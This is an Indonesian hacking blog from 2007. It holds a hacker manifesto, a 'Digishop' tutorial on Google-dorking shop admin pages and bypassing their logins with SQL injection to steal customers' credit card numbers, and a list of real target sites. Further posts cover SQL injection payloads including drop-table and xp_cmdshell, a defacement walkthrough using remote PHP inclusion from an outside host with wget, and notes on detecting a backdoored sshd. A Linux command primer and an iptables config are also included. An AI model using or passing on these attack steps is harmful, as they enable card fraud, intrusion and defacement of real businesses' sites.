Minggu, 16 Desember 2007

Manifesto Hacker


Inilah dunia kami... dunia elektron dan switch, beaty of the baud. kalian menyebut kami penjahat... karena kami menggunakan layanan yang

sudah ada tanpa membayar, padahal layanan itu seharusnya sangat murah jika tidak dikuasai oleh orang-orang rakus.
Kami kalian sebut penjahat... karena kami gemar menjelajah.
Kami kalian sebut penjahat... karena kami mengejar ilmu pengetahuan.
Kami ada tanpa warna kulit, tanpa kebangsaan, tanpa bias agama...
tapi bagi kalian kami penjahat.
Kami adalah penjahat... sedangkan kalianlah yang membuat bom nuklir, mengobarkan peperangan, membunuh, berbuat curang, berbohong,

dan berusaha membuat kami percaya bahwa itu semua demi kebaikan kami.

Ya, aku adalah penjahat. Kejahatanku adalah keingintahuanku. Kejahatanku adalah menilai orang berdasarkan perkataan dan pikiran

mereka, dan bukan berdasarkan penampilan mereka. Kejahatanku adalah menjadi lebih pintar dari kalian, sebuah dosa yang tak akan bisa

kalian ampuni.

Aku adalah hacker, dan inilah manifestoku.
kau bisa menghentikan satu, tapi kau tak bisa menghentikan semuanya...
Bagaimanapun juga, kami semua sama.
__________________
Hidup seperti berjalan di kegelapan malam, serangan bisa saja datang dari arah mana saja, tanpa diketahui siapa dan bagaimana, jadi

waspada dan bertahanlah.

Jumat, 26 Oktober 2007

Digishop


1--] Buka Google

2--] Ketik inurl:"/cart.php?m=" [atau kreasi lo sendiri]

3--] Pilih salah satu target misalnya
http://www.magichappenswithhorses.com/store/cart.php?m=
hapus tulisan cart.php?m= dengan admin
Jadi http://www.magichappenswithhorses.com/store/admin/

4--] Nanti akan muncul menu login.
Masukkan bug SQL Injection ini untuk Username dan Password
Pada Username dan Password, isi dengan 'or"="
_________________
Username : |_____'or"="______|
_________________
Password : |_____'or"="______|

5--] Klo berhasil, nanti akan muncul Main Menu dan silahkan
cari CC nya.
Liat yang pending orders karena CC nya masih ada, kalau
di pending orders CC nya udah ga ada berarti lo udah
keduluan orang, he...he...he...

6--] Klo yang muncul Invalid Username or Password, berarti SQL
Injection-nya udah ga mempan, he...he...he...silahkan cari
yang lain.

---==[ Tips : ]==---
- Klo` Lo dapet yang Order-an nya masih sedikit,
targetnya di simpen aja dulu, mungkin beberapa hari
kemudian udah ada CC baru
- Klo` dapet target bagus, jangan lupa bagi-bagi
ama gw, he...he...he...

GOOD LUCK !



---==[ Target ]==---


http://www.caycechristmasstore.com/shop/admin/

https://www.tangerineclothing.com/admin/

https://cyberlies.securesites.com/store/admin

http://studentsagainstterrorism.org/store/admin/

http://www.ethics-twi.org/store/admin/

http://www.magichappenswithhorses.com/store/admin/

http://d2bfit.com/store/admin/

https://secure.rcaf.com/onlinestore/admin/

http://www.niktec.com/admin/

http://www.7footserb.com/shop/admin/

https://www.tangerineclothing.com/admin/

https://www.flagsbygm.com/store/admin/

https://www.facesbyfelicia.com/store/admin/

Bagaimana SQL Injection menembus server


Penulis pernah di tanya oleh seorang Admin server sebuah site trading online di Jakarta, dia agak sedikit heran ketika mengetahui servernya jebol padahal dia hanya membuka port 80 dan sudah terpasang IDS (Intrusion Detection System) seperti Snort dan Snare di servernya dan anehnya ini juga tidak terdeteksi sama sekali oleh logger webserver (biasanya webserver memiliki file log untuk setiap link yang di request client). Karena kebetulan penulis sendiri yang menjebol situs tersebut maka penulis sampaikan bahwa sekuriti server tidak hanya berkaitan dengan masalah konfigurasi server, blocking port dan monitoring/detection intruder saja. Ada permasalahan yang lebih berbahaya dari sekedar setingan hardware yaitu masalah software atau aplikasi yang di gunakan baik di server maupun di halaman web. Aplikasi pengaman apapun (termasuk penggunaan enkripsi dan chipper key) tidak menjamin bahwa server itu akan aman. Di sini memang di tuntut pengetahuan dan informasi akan bugs yang berkembang saat itu.

Setiap menit, jam dan hari semakin banyak bermunculan bugs-bugs terbaru dengan model dan tipe yang berbeda-beda. Kadang hal ini tidak di sadari oleh kita bahwa bugs tersebut ternyata juga ada di server yang kita pakai. Kesibukan dan konsentrasi yang terpecah belah kadang memang membuat kita lengah dan tidak menyadari kemungkinan-kemungkinan jebolnya server yang kita setting. Seperti contoh kasus di atas juga merupakan hal yang tidak di ketahui secara sadar oleh si admin sendiri bahwa ternyata seorang hacker dengan hanya memanfaatkan aplikasi web yang di gunakan dalam sebuah website pun mampu menjebol server tersebut dan merebut akses shell command di dalam server target tanpa mengalami kesulitan. Dan kadang dengan kemampuan yang expert di programming seorang hacker pun mampu menjebol firewall yang terpasang di server target, hal ini telah di buktikan sendiri oleh penulis dengan hanya bermodalkan bugs dan script khusus, penulis bisa mendapatkan hosting-hosting berfirewall bagus baik dari operating sistem Linux, BDS (OpenBSD dan FreeBSD), Debian dan sebagainya.

Kembali ke topik di atas, kebetulan untuk server yang penulis jebol adalah jenis NT server yang memanfaatkan connectivity database seperti ODBC dan SQL yang tidak menggunakan input validation script untuk mengontrol command database yang di masukan (di injeksikan) ke dalam server. Berbicara tentang injection tentu pembaca pernah mendengar juga tentang SQL Injections yang berita-nya sangat ramai di bicarakan di milis dan site-site sekuriti. Bukan basa-basi bugs ini hampir mengenai seluruh server-server berbasiskan NT terutama untuk server NT yang memanfaatkan koneksi ke database untuk web page-nya.

Oke untuk mempermudah pemahaman para pembaca, di sini Penulis akan memberikan contoh kasus sederhana. Dulu jaman pertama kalinya bugs VP-ASP (Software Management untuk pembayaran online), Anda mungkin mengetahui tentang penggunaan karakter single quote (‘) dengan penambahan OR (logical operator) dan tanda sama dengan (=) di antara single quote tersebut.


Login: ‘ OR ‘’=’
Password: ‘ OR ‘’=’

Sedikit menganalisa, misal ketika input box untuk login dan password di isi seperti dalam contoh di atas apa yang akan terjadi jika script yang memproses input tersebut seperti di bawah ini.

var sql = "select * from users where username = '" + username + "' and password = '" + password + "'";

Untuk beberapa site yang tidak menerapkan sistem validasi input yang secure akan mengakibatkan seorang user bisa masuk baik sebagai admin atau user biasa tanpa membutuhkan login dan password yang sebenarnya. Mengapa? Karena ketika input itu di proses di sistem yang terjadi operasi tersebut di anggap valid.

var sql = "select * from users where username = '’ OR ‘’=’' and password = '’ OR ‘’=’';

Nah tamatlah sudah riwayatmu kini hehe…hehe..

Oke mungkin contoh di atas masih di anggap sangat sederhana, sekarang kalau misalnya saya melakukan action yang lebih ekstrim dari itu?

Username: '; drop table users--
Password:

Apa yang akan terjadi? Saya yakin Anda juga tahu bahwa command tersebut akan menghapus seluruh data di tabel users, coba kita analisa lagi.

var sql = "select * from users where username = '’; drop table users—

Nah apa yang akan Anda perbuat jika yang terjadi adalah seperti command di atas ini? Di sini karakter titik koma (;) menutup command pertama dan kemudian command drop menjadi command berikutnya yang akan di eksekusi oleh sistem dan selanjutnya karakter double minus (--) menutup command-command berikutnya untuk tidak di eksekusi. Yahh klo sudah begini tamatlah sudah data Anda. Paling banter Anda akan di pecat dari perusahaan dan di maki-maki bos Anda karena tidak becus bekerja.

SQL Injections tidak hanya bereaksi di dalam input box saja, dalam sebuah URL pun bisa di aplikasikan. Ini tergantung kemahiran Anda dalam melihat celah dari ketidak-secure-an site tersebut. Tentu di perlukan juga pengetahuan tentang command SQL dan beberapa eksperimen kecil untuk meriching kode di antara variabel-variabel yang ada di site tersebut.

Jadi di mana letak kesalahannya?

Dalam hal ini Microsoft sangat merespon tragedi SQL Injection, bahkan mereka sudah membuat patch-nya. Tapi sekali lagi ini tidak hanya masalah patching saja tapi juga di tuntut kehati-hatian Anda dalam merancang isi web itu sendiri. Solusinya yaa buatlah beberapa fungsi validasi input yang mampu mematikan command-command abnormal yang bisa mempengaruhi atau membuat server bereaksi.

Hanya seperti itu saja? He..hehe… pertanyaan yang sangat menohok tapi nggak papa lah.

Jika Anda mendapatkan bugs ini pada NT server maka beruntunglah Anda karena akses di luar database pun sanggup di lakukan. Seperti apa? Seperti command shell, registry, dan messaging product. Yaa sedikit tentang pengetahuan tentang sistem menjadi mutlak untuk perlu di ketahui agar Anda bisa mendapatkan akses granted administator tentu dengan dukungan kreatifitas dan mungkin jika perlu dukungan kemampuan programming yang Anda kuasai. Coba lihat beberapa command sistem yang bisa Anda manfaatkan untuk mendapatkan akses lebih banyak di server target (NT).

xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask
xp_regaddmultistring, xp_regdeletekey, xp_regdeletevalue, xp_regenumkeys, xp_regenumvalues, xp_regread
xp_regremovemultistring, xp_regwrite
xp_availablemedia, xp_dirtree, xp_enumdsn, xp_loginconfig
xp_makecab, xp_ntsec_enumdomains
xp_terminate_process



Oke, saya harap teman-teman semua bisa mengerti sampai disini. Selamat mencari target.

MENDETEKSI LOGIN SSH YANG MENGGUNAKAN MAGIC_PASSWD


Just read n no comment ...

1. Login dengan magic passwd:

[bejat@localhost project]$ ssh -l bejat localhost
bejat@localhost's password:
Last login: Thu Oct 15 11:51:04 2003 from localhost
[root@localhost bejat]#

2. Perhatikan baik2 bagian ini:

[root@localhost bejat]# ps awux
root 10320 0.0 0.5 2960 1352 ? S 11:46 0:00 /usr/sbin/sshd
kill 11507 1.1 4.3 53120 11052 ? S 13:01 0:01 xmms
kill 11557 0.1 0.5 2984 1476 pts/1 S 13:02 0:00 ssh -l bejat localhost
root 11558 0.0 0.5 5556 1536 ? S 13:02 0:00 sshd: bejat [priv]
root 11561 0.0 0.6 5644 1644 ? S 13:02 0:00 sshd:
root 11879 0.4 0.5 2600 1512 pts/2 S 13:19 0:00 -bash
kill 12206 2.2 0.5 2976 1468 pts/3 S 13:31 0:00 ssh -l john localhost
root 12207 0.6 0.6 5556 1556 ? S 13:31 0:00 sshd: john [priv]
john 12209 0.0 0.6 5644 1656 ? S 13:31 0:00 [sshd]
john 12212 2.6 0.5 2600 1512 pts/5 S 13:31 0:00 -bash
kill 12722 0.0 0.5 2976 1468 pts/4 S 14:09 0:00 ssh -l root localhost
root 12723 0.0 0.6 5564 1580 ? S 14:09 0:00 sshd: root@pts/6
root 12728 0.0 0.5 2604 1516 pts/6 S 14:09 0:00 -bash

Penjelasan bagian atas;

-- Seorang user login dengan login_name "bejat" menggunakan magic passwd, otomatis akan menjadi root:

root 11558 0.0 0.5 5556 1536 ? S 13:02 0:00 sshd: bejat [priv]
root 11561 0.0 0.6 5644 1644 ? S 13:02 0:00 sshd:
root 11879 0.4 0.5 2600 1512 pts/2 S 13:19 0:00 -bash

-- Seorang user login dengan login_name "john" menggunakan passwd nya sendiri (valid passwd):

root 12207 0.6 0.6 5556 1556 ? S 13:31 0:00 sshd: john [priv]
john 12209 0.0 0.6 5644 1656 ? S 13:31 0:00 [sshd]
john 12212 2.6 0.5 2600 1512 pts/5 S 13:31 0:00 -bash

-- sytem sshd anda telah di infeksikan magic-passwd apabila tiap user yang login nampak bagian sbb:

root 11558 0.0 0.5 5556 1536 ? S 13:02 0:00 sshd: login_name [priv]
root 11561 0.0 0.6 5644 1644 ? S 13:02 0:00 sshd:

-- system yang normal (tidak terinfeksi):

root 12207 0.0 0.5 5556 1536 ? S 13:31 0:00 /usr/sbin/sshd
john 12209 0.0 0.6 5644 1656 ? S 13:31 0:00 [sshd]
<-- dengan tanda kurung apabila user

-- apabila root yang login dengan valid passwd:

root 12723 0.0 0.6 5564 1580 ? S 14:09 0:00 sshd: root@pts/6 <-- root dgn valid passwd akan tampak begini
root 12728 0.0 0.5 2604 1516 pts/6 S 14:09 0:00 -bash


3. Login dengan login_name "apache" menggunakan magic passwd:

[kill@localhost project]$ ssh -l apache localhost
apache@localhost's password:
-sh-2.05b# id
uid=0(root) gid=0(root) groups=0(root)
-sh-2.05b# pwd
/var/www
-sh-2.05b#

4. Terlihat tanda2nya:

[kill@localhost project]$ ps awux
kill 11861 1.2 4.1 53248 10720 ? S 13:18 0:01 xmms
kill 11931 0.5 0.5 2984 1476 pts/4 S 13:20 0:00 ssh -l apache localhost
root 11932 0.0 0.5 5556 1536 ? S 13:20 0:00 sshd: apache [priv]
root 11934 0.0 0.6 5644 1644 ? S 13:20 0:00 sshd:
root 11937 0.2 0.5 2600 1516 pts/2 S 13:20 0:00 -sh
kill 11967 0.0 0.2 2580 760 pts/1 R 13:20 0:00 ps awux

Kesimpulan:
Semua valid passwd yang login di log di suatu tempat apabila ada "sshd:". Atau dengan kata lain, apabila anda menemukan "sshd:" di command "ps awux" artinya system anda telah terinfeksi "magic_passwd". ExpLorE y0uR 0wN sYstEm. B-Creative!!!!

5. Penutup

Keep this Open-Source spirit up. This system is aLL about binary, if you are NOT 1 then you are 0. Knowledge is belong to the world, share it. Kritik, saran dan caci maki silahkan kirim ke wongbejat@yahoo.com

Online BUddiEs:
ken_ken,padhawa,menyun,co_biasa,rey_cute,Bugs_,ghareng,Rocks,Lingah,dr[pluto],Budha,superbagonk. Special buat teman2 yang tidak bisa disebutkan satu persatu di #Surabayahackerlink, #yogyacarderlink, #its, #awam, #censor @t DAL.Net.

Offline d00d:
someone

Salam hangat buat crew #its, #Surabayahackerlink, #yogyacarderlink. <-- OpenSource Team

-----------------------
To follow the path;
look to the master,
follow the master,
walk with the master,
see through the master,
become the master.
-----------------------
Hacking is NOT instant.

Best Regs
bejat

Memblokir Akses ke Situs Web dengan Squid

Ringkasan ini tidak tersedia. Harap klik di sini untuk melihat postingan.

Linux Untuk Pemula


Seperti halnya bila kita mengetikkan perintah di DOS, command line atau baris perintah Linux juga diketikkan di prompt dan diakhiri enter untuk mengeksekusi perintah tersebut. Baris perintah merupakan cara yang lebih efisien untuk melakukan sesuatu pekerjaan oleh karena itu pemakai Linux tetap mengandalkan cara ini untuk bekerja.

Sebaiknya pemula juga harus mengetahui dan sedikitnya pernah menggunanakan perintah baris ini karena suatu saat pengetahuan akan perintah-perintah ini bisa sangat diperlukan.Saya mengumpulkan beberapa perintah dasar yang mungkin kelak akan sering digunakan terutama oleh para pemula. Perhatian: pengetahuan akan perintah-perintah yang lain akan segera bertambah seiring dengan kemajuan Anda menguasai sistem operasi Linux ini. Penjelasan masing-masing perintah akan dipersingkat saja dan untuk mengetahui lebih detail lagi fungsi-fungsi suatu perintah, Anda dapat melihat manualnya, misalnya dengan mengetikkan perintah man:

$ man ls

Manual tersebut akan menampilkan bagaimana cara penggunaan perintah ls itu secara lengkap.

-- Perintah &
Perintah & dipakai dibelakang perintah lain dan menjalankannya di background. Tujuannya adalah untuk membebaskan shell agar bisa dipergunakan menjalankan proses-proses yang lain. Lihat juga perintah bg dan fg.


-- Perintah adduser
Biasanya hanya dilakukan oleh root untuk menambahkan user atau account yg baru. Setelah perintah ini bisa dilanjutkan dengan perintah passwd, yaitu perintah untuk membuat password bagi user tersebut.

# adduser scut
# passwd scut

Selanjutnya Anda akan diminta memasukkan password untuk user udin. Isikan password untuk udin dua kali dengan kata yang sama.

-- Perintah alias
Digunakan untuk memberi nama lain dari sebuah perintah. Misalnya bila Anda ingin perintah ls dapat juga dijalankandengan mengetikkan perintah dir, maka buatlah aliasnya sbb:

$ alias dir=ls

Untuk melihat perintah-perintah apa saja yang mempunyai nama lain saat itu, cukup ketikkan alias. Lihat juga perintah unalias.


-- Perintah bg
Untuk memaksa sebuah proses yang dihentikan sementara(suspend) agar berjalan di background. Misalnya Anda sedang menjalankan sebuah perintah di foreground (tanpa diakhiri perintah &) dan suatu saat Anda membutuhkan shell tersebut maka Anda dapat memberhentikan sementara perintah tersebut dengan Ctrl-Z kemudian ketikan perintah bg untuk menjalakannya di background. Dengan cara ini Anda telah membebaskanshell tapi tetap mempertahankan perintah lama berjalan di background. Lihat juga perintah fg.

-- Perintah cat

Menampilkan isi dari sebuah file di layar.

$ cat namafile

-- Perintah cd
Change Directory atau untuk berpindah direktori dan saya kira Anda tidak akan menemui kesulitan menggunakan perintah ini karena cara penggunaanya mirip dengan perintah cd di DOS.

-- Perintah chgrp
Perintah ini digunakan untuk merubah kepemilikan kelompok file atau direktori. Misalnya untuk memberi ijin pada kelompok atau grup agar dapat mengakses suatu file. Sintaks penulisannya adalah sbb:

# chgrp

-- Perintah chmod
Digunakan untuk menambah dan mengurangi ijin pemakai untuk mengakses file atau direktori. Anda dapat menggunakan sistem numeric coding atau sistem letter coding. Ada tiga jenis permission/perijinan yang dapat dirubah yaitu r untuk read, w untuk write dan x untuk execute.

Dengan menggunakan letter coding, Anda dapat merubah permission diatas untuk masing-masing u (user), g (group), o (other) dan a (all) dengan hanya memberi tanda plus (+) untuk menambah ijin dan tanda minus (-) untuk mencabut ijin.

Misalnya untuk memberikan ijin baca dan eksekusi file coba1 kepada owner dan group, perintahnya adalah:

$ chmod ug+rx coba1

Untuk mencabut ijin-ijin tersebut:

$ chmod ug-rx coba1

Dengan menggunakan sitem numeric coding, permission untukuser, group dan other ditentukan dengan menggunakan kombinasi angka-angka, 4, 2 dan 1 dimana 4 (read), 2 (write) dan 1 (execute).

Misalnya untuk memberikan ijin baca(4), tulis(2) dan eksekusi(1) file coba2 kepada owner, perintahnya adalah:

$ chmod 700 coba2

Contoh lain, untuk memberi ijin baca(4) dan tulis(2) file coba3 kepada user, baca(4) saja kepada group dan other, perintahnya adalah:

$ chmod 644 coba3


-- Perintah chown
Merubah user ID (owner) sebuah file atau direktori

$ chown

-- Perintah cp
Untuk menyalin file atau copy. Misalnya untuk menyalin file1 menjadi file2:

$ cp

-- Perintah fg
Mengembalikan suatu proses yang dihentikan sementar(suspend) agar berjalan kembali di foreground. Lihat juga perintah bg diatas.

-- Perintah find
Untuk menemukan dimana letak sebuah file. Perintah ini akan mencari file sesuai dengan kriteria yang Anda tentukan. Sintaksnya adalah perintah itu sendiri diikuti dengan nama direktori awal pencarian, kemudian nama file (bisa menggunakan wildcard, metacharacters) dan terakhir menentukan bagaimana hasil pencarian itu akan ditampilkan. Misalnya akan dicari semua file yang berakhiran .doc di current direktori serta tampilkan hasilnya di layar:

$ find . -name *.doc -print
. /public/docs/account.doc
. /public/docs/balance.doc
. /public/docs/statistik/prospek.doc
./public/docs/statistik/presconf.doc

-- Perintah grep
Global regular expresion parse atau grep adalah perintah untuk mencari file-file yang mengandung teks dengan kriteria yang telah Anda tentukan.

$ grep

Misalnya akan dicari file-file yang mengandung teks marginal di current direktori:

$ grep marginal
diferent.doc: Catatan: perkataan marginal luas dipergunakan di dalam ilmu ekonomi
prob.rtf: oleh fungsi hasil marginal dan fungsi biaya marginal jika fungsi
prob.rtf: jika biaya marginal dan hasil marginal diketahui maka biaya total

-- Perintah gzip
Ini adalah software kompresi zip versi GNU, fungsinya untuk mengkompresi sebuah file. Sintaksnya sangat sederhana:

$ gzip

Walaupun demikian Anda bisa memberikan parameter tertentu bila memerlukan kompresi file yang lebih baik, silakan melihat manual page-nya. Lihat juga file tar, unzip dan zip.

-- Perintah halt
Perintah ini hanya bisa dijalankan oleh super user atau Anda harus login sebagai root. Perintah ini untuk memberitahu kernel supaya mematikan sistem atau shutdown.

-- Perintah hostname
Untuk menampilkan host atau domain name sistem dan bisa pula digunakan untuk mengesset nama host sistem.

[flory@localhost docs] $ hostname
localhost.localdomain

-- Perintah kill
Perintah ini akan mengirimkan sinyal ke sebuah proses yang kita tentukan. Tujuannya adalah menghentikan proses.

$ kill

PID adalah nomor proses yang akan di hentikan.

-- Perintah less
Perintah ini sama fungsinya dengan perintah more (melihat isi dari sebuah file) dan hampir sama juga dengan perintah cat.

-- Perintah login
Untuk masuk ke sistem dengan memasukkan login ID atau dapat juga digunakan untuk berpindah dari user satu ke user lainnya.

-- Perintah logout
Perintah yang digunakan apabila kita mau keluar dari sistem

-- Perintah ls
Menampilkan isi dari sebuah direktori seperti perintah dir di DOS. Anda dapat menggunakan beberapa option yang disediakan untuk mengatur tampilannya di layar. Bila Anda menjalankan perintah ini tanpa option maka akan ditampilkan seluruh file nonhidden(file tanpa awalan tanda titik) secara alfabet dan secara melebar mengisi kolom layar. Option -la artinya menampilkan seluruh file/all termasuk file hidden(file dengan awalan tanda titik) dengan format panjang.

$ ls

$ ls -al

$ ls -a1

-- Perintah man
Untuk menampilkan manual page atau teks yang menjelaskan secara detail bagaimana cara penggunaan sebuah perintah. Perintah ini berguna sekali bila sewaktu-waktu Anda lupa atau tidak mengetahui fungsi dan cara menggunakan sebuah perintah.

$ man

-- Perintah mesg
Perintah ini digunakan oleh user untuk memberikan ijin user lain menampilkan pesan dilayar terminal. Misalnya mesg Anda dalam posisi y maka user lain bisa menampilkan pesan di layar Anda dengan write atau talk.

$ mesg y atau mesg n

Gunakan mesg n bila Anda tidak ingin diganggu dengan tampilan pesan-pesan dari user lain.

-- Perintah mkdir
Membuat direktori baru, sama dengan perintah md di DOS.

$ mkdir

-- Perintah more
Mempaging halaman, seperti halnya less.


-- Perintah mount
Perintah ini akan me-mount filesystem ke suatu direktori atau mount-point yang telah ditentukan. Hanya superuser yang bisa menjalankan perintah ini. Untuk melihat filesystem apa saja beserta mount-pointnya saat itu, ketikkan perintah mount. Perintah ini dapat Anda pelajari di bab mengenai filesystem. Lihat juga perintah umount.

$ mount
/dev/hda3 on / type ext2 (rw)
none on /proc type proc (rw)
/dev/hda1 on /dos type vfat (rw)
/dev/hda4 on /usr type ext2 (rw)
none on /dev/pts type devpts (rw,mode=0622)

-- Perintah mv
Untuk memindahkan file dari satu lokasi ke lokasi yang lain. Bila argumen yang kedua berupa sebuah direktori maka mv akan memindahkan file ke direktori tersebut. Bila kedua argumen berupa file maka nama file pertama akan menimpa file kedua. Akan terjadi kesalahan bila Anda memasukkan lebih dari dua argumen kecuali argumen terakhir berupa sebuah direktori.

$ mv psybnc /var/tmp

$ mv psybnc

-- Perintah passwd
Digunakan untuk mengganti password. Anda akan selalu diminta mengisikan password lama dan selanjutnya akan diminta mengisikan password baru sebanyak dua kali. Password sedikitnya terdiri dari enam karakter dan sedikitnya mengandung sebuah karakter.

$ passwd

-- Perintah pwd
Menampilkan nama direktori dimana Anda saat itu sedang berada.

-- Perintah rm
Untuk menghapus file dan secara default rm tidak menghapus direktori. Gunakan secara hati-hati perintah ini terutama dengan option -r yang secara rekursif dapat mengapus seluruh file.

$ rm -rf

$ rm -f

$ rm

-- Perintah rmdir
Untuk menghapus direktori kosong.

$ rmdir

-- Perintah shutdown
Perintah ini untuk mematikan sistem, seperti perintah halt. Pada beberapa sistem anda bisa menghentikan komputer dengan perintah shutdown -h now dan merestart sistem dengan perintah shutdown -r now atau dengan kombinasi tombol Ctr-Alt-Del.

# shutdown -r now

-- Perintah su
Untuk login sementara sebagai user lain. Bila user ID tidak disertakan maka komputer menganggap Anda ingin login sementara sebagai super user atau root. Bila Anda bukan root dan user lain itu memiliki password maka Anda harus memasukkan passwordnya dengan benar. Tapi bila Anda adalah root maka Anda dapat login sebagai user lain tanpa perlu mengetahui password user tersebut.


-- Perintah tail
Menampilkan 10 baris terakhir dari suatu file. Default baris yang ditampilkan adalah 10 tapi Anda bisa menentukan sendiri berapa baris yang ingin ditampilkan:

$ tail

-- Perintah talk
Untuk mengadakan percakapan melalui terminal. Input dari terminal Anda akan disalin di terminal user lain, begitu sebaliknya.

-- Perintah tar
Menyimpan dan mengekstrak file dari media seperti tape drive atau hard disk. File arsip tersebut sering disebut sebagai file tar. Sintaknya sebagai berikut:

$ tar

-- Perintah umount
Adalah kebalikan dari perintah mount, yaitu untuk meng-unmount filesystem dari mount-pointnya. Setelah perintah ini dijalankan direktori yang menjadi mount-point tidak lagi bisa digunakan.

# umount

-- Perintah unalias
Kebalikan dari perintah alias, perintah ini akan membatalkan sebuah alias. Jadi untuk membatalkan alias dir seperti telah dicontohkan diatas, gunakan perintah:

$ unalias dir

-- Perintah unzip
Digunakan untuk mengekstrak atau menguraikan file yang dikompres dengan zip. Sintaknya sederhana dan akan mengekstrak file yang anda tentukan:

$ unzip

Lihat juga perintah-perintah gzip dan unzip.

-- Perintah wall
Mengirimkan pesan dan menampilkannya di terminal tiap user yang sedang login. Perintah ini berguna bagi superuser atau root untuk memberikan peringatan ke seluruh user, misalnya pemberitahuan bahwa server sesaat lagi akan dimatikan.

# who Dear, everyone..... segera simpan pekerjaan kalian, server akan saya matikan 10 menit lagi.

-- Perintah who
Untuk menampilkan siapa saja yang sedang login. Perintah ini akan menampilkan informasi mengenai login name, jenis terminal, waktu login dan remote hostname untuk setiap user yang saat itu sedang login. Misalnya:

$ who

-- Perintah xhost +
Perintah ini digunakan untuk memberi akses atau menghapus akses(xhost -) host atau user ke sebuah server X.


-- Perintah xset
Perintah ini untuk mengeset beberapa option di X Window seperti bunyi bel, kecepatan mouse, font, parameter screen saver dan sebagainya. Misalnya bunyi bel dan kecepatan mouse dapat Anda set menggunakan perintah ini:

$ xset b

$ xset m

-- Perintah zip
Perintah ini akan membuat dan menambahkan file ke dalam file arsip zip. Lihat juga perintah gzip dan unzip.

Selamat Belajar.
bejat

DEFACE with PHP Injection


Sekarang anda bisa menggunakan php inject tersebut untuk deface web atau yang lainya. Sekrang buka search engine anda dengan keyword atau allinurl: index.php?*=* atau main.php?*=* atau module.php?*=* dan banyak lagi. Usahakan cari target yang urlnya mengandung tanda tanya ".php?"

contoh : www.targetanda.com/index.php?id=12 atau www.targetanda.com/main.php?content=ayam.

Kemudian hapus semua tulisan yang ada dibelakang "=" yang paling dekat dengan ".php?" kemudian ganti dengan alamat url php inject anda di upload. Misal saya menggunakan php inject ini http://geocities.com/rhiend_masters/inject.htm?&cmd=id dan target kita misalkan :

www.targetanda.com/index.php?id=12 sehingga urlnya menjadi :

www.targetanda.com/index.php?id=http://geocities.com/xbejat/inject.htm?&cmd=pwd

cari target anda sampai keluar :

--------------------------------------------------------------------------------

/home/bejat/public_html/

--------------------------------------------------------------------------------

intinya harus keluar seperti ini /home/mela/public_html/ kalau tidak ada, silakan tinggalkan target. Jika sudah dapat target lihat isi file yang ada didalam folder tersebut dengan perintah ls -al urlnya menjadi :

www.targetanda.com/index.php?id=http:// geocities.com/xbejat/inject.htm?&cmd=ls -al

nanti anda akan melihat seperti ini :

total 1023
drwxrwxrwx 100 nobody nobody 43203 temp
drwx---rw- 3 nobody nobody 1234 shop
drwxr-xr-x 11 nobody nobody 23421 images
drwx------ 1000 nobody nobody 12345 cache
-rwxr-xr-x 1 nobody nobody 1234 index.html
-rwxrwxrwx 1 nobody nobody 2332 bejat.jpg

Anda hanya bisa mendownload file kedalam web tersebut jika permisinnya mendukung. Lihat tanda drwxr-xr-x semua yang ada tanda d -nya berarti folder sedangkan yang lainnya file. folder yang mendukung untuk melakukan download mengganti nama file dan sebagainya jika bentuknya seperti ini drwxrwxrwx, silahkan anda belajar tentang dasar-dasar linux. Jika anda ingin mendeface simpan web karya anda yang ingin ditampilkan ditarget pada webhosting lain dengan nama index.html. Kemudian lakukan perintah ini dengan php inject anda : mv index.html backup.html ==> mengganti nama file index.html, contoh perintahnya :

www.targetanda.com/index.php?id=http://geocities.com/xbejat/inject.htm?&cmd=mv index.html backup.html.

Maka filenya berubah menjadi seperti ini saat anda menjalankan perintah ls -al:

total 1023
drwxrwxrwx 100 nobody nobody 43203 temp
drwx---rw- 3 nobody nobody 1234 shop
drwxr-xr-x 11 nobody nobody 23421 images
drwx------ 1000 nobody nobody 12345 cache
-rwxr-xr-x 1 nobody nobody 1234 backup.html
-rwxrwxrwx 1 nobody nobody 2332 bejat.jpg

Lalu download lah file anda dengan perintah wget http://hosting_anda.com/ index.html, contoh perintahnya :

www.targetanda.com/index.php?id=http://geocities.com/xbejat/inject.htm?&cmd=wget http://hosting_anda.com/index.html.

total 1023
drwxrwxrwx 100 nobody nobody 43203 temp
drwx---rw- 3 nobody nobody 1234 shop
drwxr-xr-x 11 nobody nobody 23421 images
drwx------ 1000 nobody nobody 12345 cache
-rwxr-xr-x 1 nobody nobody 1234 index.html
-rwxr-xr-x 1 nobody nobody 1234 backup.html
-rwxr-xr-x 1 nobody nobody 2332 bejat.jpg

Nah Sekarang coba lihat web target anda apa yang terjadi www.hosting_target.com/index.html Anda bisa mencoba perintah-perintah lainya seperti locate nama_file dan perintah unix lainnya.

Sabtu, 06 Oktober 2007

Setting IP


install iptables sesuai distro

kalo kaga command

apt-get install iptables OR yum install iptables

cd /etc/sysconfig/

nah pada directory ini lo bikin file iptables

nano iptables

kalo udah di sana loe masukin rule nya contoh :

+-(root@lvps212-241-196-154.vps.webfusion.co.uk)(09:25:10)
+-($ Mb)(~)-> cat /etc/sysconfig/iptables
# Generated by iptables-save v1.2.9 on Sat Mar 3 23:07:59 2007
*mangle
:PREROUTING ACCEPT [117:19386]
:INPUT ACCEPT [117:19386]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [107:8369]
:POSTROUTING ACCEPT [107:8369]
COMMIT
# Completed on Sat Mar 3 23:07:59 2007
# Generated by iptables-save v1.2.9 on Sat Mar 3 23:07:59 2007
*filter
:FORWARD ACCEPT [0:0]
:INPUT ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
-A INPUT -p udp -j REJECT
-A INPUT -p icmp --icmp-type echo-request -j DROP
-A INPUT -p tcp --dport 21 -j ACCEPT
-A INPUT -p tcp --dport 10000 -j REJECT
-A INPUT -p tcp --dport 25 -j REJECT
-A INPUT -p udp --dport 53 -j ACCEPT
-A INPUT -p tcp --dport 2020 -j ACCEPT
-A INPUT -p tcp --dport 110 -j REJECT
-A INPUT -p tcp --dport 113 -j REJECT
-A INPUT -p tcp --dport 465 -j REJECT
-A INPUT -p tcp --dport 993 -j REJECT
-A INPUT -p tcp --dport 995 -j REJECT
-A INPUT -p tcp --dport 143 -j REJECT
-A INPUT -p tcp --dport 80 -j ACCEPT
-A INPUT -p tcp --dport 3306 -j REJECT
-A INPUT -p tcp --dport 8080 -j REJECT
COMMIT
# Generated by webmin
*nat
:OUTPUT ACCEPT [0:0]
:PREROUTING ACCEPT [0:0]
:POSTROUTING ACCEPT [0:0]
COMMIT
# Completed

--------------------------------

nah kalo udah save lalu iptables-save

service iptables restart

